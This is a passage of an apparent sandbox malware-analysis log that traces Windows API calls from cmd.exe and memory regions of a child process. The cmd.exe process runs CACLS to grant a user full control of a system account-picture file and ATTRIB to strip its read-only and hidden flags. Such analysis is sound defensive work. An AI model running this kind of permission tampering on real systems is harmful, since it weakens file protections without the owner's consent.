hFindFile=0x3a0ae8) returned 1 [0182.557] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f88c | out: lpFindFileData=0x24f88c) returned 0x3a0ae8 [0182.557] FindClose (in: 
hFindFile=0x3a0ae8 | out: hFindFile=0x3a0ae8) returned 1 [0182.557] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f88c | out: lpFindFileData=0x24f88c) returned 0x3a0ae8 [0182.557] FindClose (in: hFindFile=0x3a0ae8 | out: hFindFile=0x3a0ae8) returned 1 [0182.557] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0182.557] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0182.557] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0182.558] GetEnvironmentStringsW () returned 0x3a0308* [0182.558] FreeEnvironmentStringsW (penv=0x3a0308) returned 1 [0182.558] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0182.558] GetConsoleOutputCP () returned 0x1b5 [0182.559] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0182.559] GetUserDefaultLCID () returned 0x409 [0182.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0182.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24fc50, cchData=128 | out: lpLCData="0") returned 2 [0182.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24fc50, cchData=128 | out: lpLCData="0") returned 2 [0182.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24fc50, cchData=128 | out: lpLCData="1") returned 2 [0182.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0182.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0182.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0182.560] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0182.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0182.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0182.560] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0182.561] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0182.561] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0182.561] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0182.561] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0182.562] GetConsoleTitleW (in: lpConsoleTitle=0x3909b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.562] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0182.562] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0182.562] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0182.562] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0182.563] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0182.563] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0182.563] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0182.563] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0182.563] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0182.564] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0182.564] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0182.564] _wcsicmp (_String1="REM/?", 
_String2="CACLS") returned 15 [0182.567] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0182.567] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0182.567] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0182.567] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0182.567] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0182.567] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0182.567] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0182.570] GetConsoleTitleW (in: lpConsoleTitle=0x24f8e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.570] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0182.570] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0182.570] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0182.570] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0182.570] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0182.570] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0182.570] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0182.570] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0182.570] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0182.570] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0182.570] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0182.570] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0182.570] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0182.570] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0182.570] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0182.570] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0182.570] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0182.570] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0182.570] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0182.570] _wcsicmp (_String1="CACLS", 
_String2="PATH") returned -13 [0182.570] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0182.570] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0182.570] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0182.570] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0182.571] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0182.571] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0182.571] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0182.571] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0182.571] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0182.571] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0182.571] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0182.571] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0182.571] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0182.571] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0182.571] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0182.571] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0182.571] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0182.571] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0182.571] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0182.571] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0182.571] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0182.571] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0182.571] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0182.571] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0182.571] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0182.571] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0182.571] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0182.571] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0182.571] _wcsicmp 
(_String1="CACLS", _String2="CHDIR") returned -7 [0182.571] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0182.571] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0182.571] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0182.571] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0182.571] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0182.571] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0182.571] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0182.571] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0182.571] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0182.571] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0182.571] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0182.572] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0182.572] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0182.572] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0182.572] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0182.572] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0182.572] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0182.572] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0182.572] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0182.572] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0182.572] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0182.572] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0182.572] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0182.572] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0182.572] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0182.572] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0182.572] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0182.572] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0182.572] 
_wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0182.572] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0182.572] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0182.572] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0182.572] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0182.572] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0182.572] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0182.572] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0182.572] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0182.572] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0182.573] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0182.573] SetErrorMode (uMode=0x0) returned 0x0 [0182.573] SetErrorMode (uMode=0x1) returned 0x0 [0182.573] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3a1e98, lpFilePart=0x24f404 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24f404*="Desktop") returned 0x18 [0182.573] SetErrorMode (uMode=0x0) returned 0x1 [0182.573] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0182.573] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0182.580] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0182.580] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x24f180, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f180) returned 0xffffffff [0182.581] GetLastError () returned 0x2 [0182.581] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x24f180, 
fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f180) returned 0xffffffff [0182.581] GetLastError () returned 0x2 [0182.581] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x24f180, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f180) returned 0x3a2180 [0182.581] FindClose (in: hFindFile=0x3a2180 | out: hFindFile=0x3a2180) returned 1 [0182.581] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x24f180, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f180) returned 0xffffffff [0182.582] GetLastError () returned 0x2 [0182.582] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x24f180, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f180) returned 0x3a2180 [0182.582] FindClose (in: hFindFile=0x3a2180 | out: hFindFile=0x3a2180) returned 1 [0182.582] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0182.582] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0182.582] GetConsoleTitleW (in: lpConsoleTitle=0x24f678, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.582] InitializeProcThreadAttributeList (in: lpAttributeList=0x24f500, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24f5c8 | out: lpAttributeList=0x24f500, lpSize=0x24f5c8) returned 1 [0182.582] UpdateProcThreadAttribute (in: lpAttributeList=0x24f500, dwFlags=0x0, Attribute=0x60001, lpValue=0x24f5c0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24f500, lpPreviousValue=0x0) returned 1 [0182.582] GetStartupInfoW (in: lpStartupInfo=0x24f4bc | out: lpStartupInfo=0x24f4bc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, 
dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0182.582] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0182.583] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x24f55c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24f5a8 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x24f5a8*(hProcess=0x50, hThread=0x4c, dwProcessId=0xd2c, dwThreadId=0x6fc)) returned 1 [0182.587] CloseHandle (hObject=0x4c) returned 1 [0182.587] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0182.587] GetEnvironmentStringsW () returned 0x3a0308* [0182.587] FreeEnvironmentStringsW (penv=0x3a0308) returned 1 [0182.587] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0182.821] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x24f49c | out: lpExitCode=0x24f49c*=0x0) returned 1 [0182.821] CloseHandle (hObject=0x50) returned 1 [0182.821] _vsnwprintf (in: _Buffer=0x24f5e4, _BufferCount=0x13, _Format="%08X", _ArgList=0x24f4a8 | out: _Buffer="00000000") returned 8 [0182.821] SetEnvironmentVariableW 
(lpName="=ExitCode", lpValue="00000000") returned 1 [0182.821] GetEnvironmentStringsW () returned 0x3a2410* [0182.821] FreeEnvironmentStringsW (penv=0x3a2410) returned 1 [0182.821] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0182.821] GetEnvironmentStringsW () returned 0x3a2410* [0182.821] FreeEnvironmentStringsW (penv=0x3a2410) returned 1 [0182.822] DeleteProcThreadAttributeList (in: lpAttributeList=0x24f500 | out: lpAttributeList=0x24f500) [0182.822] GetConsoleTitleW (in: lpConsoleTitle=0x24f8e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.822] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0182.822] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0182.822] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0182.822] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x24f180, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f180) returned 0xffffffff [0182.822] GetLastError () returned 0x2 [0182.823] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x24f180, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f180) returned 0xffffffff [0182.823] GetLastError () returned 0x2 [0182.823] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x24f180, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f180) returned 0x39e4d8 [0182.823] FindClose (in: hFindFile=0x39e4d8 | out: hFindFile=0x39e4d8) returned 1 [0182.823] FindFirstFileExW (in: 
lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x24f180, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f180) returned 0xffffffff [0182.823] GetLastError () returned 0x2 [0182.823] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x24f180, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f180) returned 0x39e4d8 [0182.823] FindClose (in: hFindFile=0x39e4d8 | out: hFindFile=0x39e4d8) returned 1 [0182.823] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0182.823] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0182.823] GetConsoleTitleW (in: lpConsoleTitle=0x24f678, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.824] InitializeProcThreadAttributeList (in: lpAttributeList=0x24f500, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24f5c8 | out: lpAttributeList=0x24f500, lpSize=0x24f5c8) returned 1 [0182.824] UpdateProcThreadAttribute (in: lpAttributeList=0x24f500, dwFlags=0x0, Attribute=0x60001, lpValue=0x24f5c0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24f500, lpPreviousValue=0x0) returned 1 [0182.824] GetStartupInfoW (in: lpStartupInfo=0x24f4bc | out: lpStartupInfo=0x24f4bc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0182.824] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0182.824] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, 
bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x24f55c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24f5a8 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp\"", lpProcessInformation=0x24f5a8*(hProcess=0x4c, hThread=0x50, dwProcessId=0xec4, dwThreadId=0x70c)) returned 1 [0182.826] CloseHandle (hObject=0x50) returned 1 [0182.826] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0182.826] GetEnvironmentStringsW () returned 0x3a2410* [0182.826] FreeEnvironmentStringsW (penv=0x3a2410) returned 1 [0182.826] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0182.911] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x24f49c | out: lpExitCode=0x24f49c*=0x0) returned 1 [0182.911] CloseHandle (hObject=0x4c) returned 1 [0182.911] _vsnwprintf (in: _Buffer=0x24f5e4, _BufferCount=0x13, _Format="%08X", _ArgList=0x24f4a8 | out: _Buffer="00000000") returned 8 [0182.911] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0182.912] GetEnvironmentStringsW () returned 0x3a2410* [0182.912] FreeEnvironmentStringsW (penv=0x3a2410) returned 1 [0182.912] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0182.912] GetEnvironmentStringsW () returned 0x3a2410* [0182.912] FreeEnvironmentStringsW (penv=0x3a2410) returned 1 [0182.912] DeleteProcThreadAttributeList (in: lpAttributeList=0x24f500 | out: lpAttributeList=0x24f500) [0182.912] _get_osfhandle (_FileHandle=1) returned 0x7 
[0182.912] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0182.912] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.912] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0182.912] _get_osfhandle (_FileHandle=0) returned 0x3 [0182.912] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0182.912] SetConsoleInputExeNameW () returned 0x1 [0182.912] GetConsoleOutputCP () returned 0x1b5 [0182.912] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0182.912] SetThreadUILanguage (LangId=0x0) returned 0x409 [0182.913] exit (_Code=0) Process: id = "350" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16a80" os_pid = "0xd2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "349" os_parent_pid = "0xc54" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25787 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25788 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25789 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 
25790 start_va = 0xb0000 end_va = 0xb8fff entry_point = 0xb0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 25791 start_va = 0x1b0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 25792 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25793 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25794 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25795 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 25796 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25797 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25798 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25799 start_va = 0xc0000 end_va = 0x126fff entry_point = 0xc0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25800 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 25801 start_va = 0x440000 end_va 
